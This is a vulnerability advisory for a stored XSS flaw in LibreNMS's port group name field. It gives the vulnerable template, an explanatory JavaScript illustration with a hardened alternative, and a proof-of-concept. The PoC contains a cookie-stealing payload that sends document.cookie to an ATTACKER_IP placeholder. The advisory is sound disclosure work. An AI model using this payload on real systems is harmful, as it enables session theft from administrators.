CVE-2026-26992

EPSS 0.00%

LibreNMS /port-groups name Stored Cross-Site Scripting

Published: 2/18/2026
Modified: 2/20/2026
Also known as: GHSA-93fx-g747-695x

Description

### Summary

**/port-groups name Stored Cross-Site Scripting**

- HTTP POST
- Request-URI(s): "/port-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

### Details

The vulnerability exists because the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

_resources/views/port-group/index.blade.php:_

```
@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
    <x-panel id="manage-port-groups-panel">
        {{-- [...Truncated...] --}}
        @foreach($port_groups as $port_group)
            {{-- [...Truncated...] --}}
            <button type="button" class="btn btn-danger btn-sm"
                    title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
                    onclick="delete_pg(this, '{{ $port_group->name }}', '{{ route('port-groups.destroy', $port_group->id) }}')">
            {{-- the port group's name is spliced into the Delete button's onclick handler without sanitizing for XSS-related characters/strings --}}
```

As the port group's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.
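Why the template's `{{ }}` escaping does not help here, as an added illustration that is not LibreNMS code: the value is HTML-escaped, but it lands inside a JavaScript string literal in an `onclick` attribute, and the HTML parser decodes the entities before the JavaScript engine ever parses the handler. The `htmlEscape`/`htmlAttrDecode` helpers model Blade and browser behaviour, and the `data-*` rendering is an assumed hardened pattern, not the project's own fix.

```javascript
// Added illustration, not LibreNMS code: HTML-escaping a value that is spliced into a
// JavaScript string literal inside an onclick attribute does not stop the breakout,
// because the HTML parser decodes the entities before the JS engine parses the handler.

// Models Blade's {{ }} output (PHP htmlspecialchars with ENT_QUOTES).
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Models the browser decoding an attribute value before it is handed to the JS engine.
function htmlAttrDecode(s) {
  return s
    .replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)))
    .replace(/&quot;/g, '"').replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&amp;/g, "&");
}

// Vulnerable pattern from the template: the escaped name lands inside a JS string literal.
function renderInlineHandler(name, destroyUrl) {
  return `delete_pg(this, '${htmlEscape(name)}', '${htmlEscape(destroyUrl)}')`;
}

// The handler source the browser actually executes, after attribute decoding.
function handlerAsExecuted(name, destroyUrl) {
  return htmlAttrDecode(renderInlineHandler(name, destroyUrl));
}

// True only if the first string literal of the executed handler still holds the whole name.
function firstLiteralIsIntact(name, destroyUrl) {
  const m = /^delete_pg\(this, '((?:[^'\\]|\\.)*)'/.exec(handlerAsExecuted(name, destroyUrl));
  return m !== null && m[1] === name;
}

// Hardened pattern (assumed, not the project's fix): keep the name in a data-* attribute,
// which is pure HTML context, and let a non-inline handler read it from the element.
function renderDataAttrs(name, destroyUrl) {
  return `data-name="${htmlEscape(name)}" data-url="${htmlEscape(destroyUrl)}"`;
}

// What element.dataset.name would yield: the decoded attribute, never parsed as JS.
function readDataName(renderedAttrs) {
  return htmlAttrDecode(/data-name="([^"]*)"/.exec(renderedAttrs)[1]);
}

// Constructed sample names: a benign one and one carrying a quote that ends the literal.
const BENIGN_NAME = "Core switches";
const QUOTE_NAME = "x'); /* not a name */ ('";
```

With the `data-*` rendering, a name containing quotes round-trips unchanged because it is only ever decoded as HTML, never re-parsed as JavaScript.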
### PoC

- Login
- Select Ports > Manage Port Groups
- Select New Port Group
- Input `12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345` into the "Name" input box (change `<ATTACKER_IP>` to the IP of an attacker-controlled webserver)
- Select Save
- Select the Delete icon for the newly created Port Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker-controlled server, leaking the user's cookies.

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N |
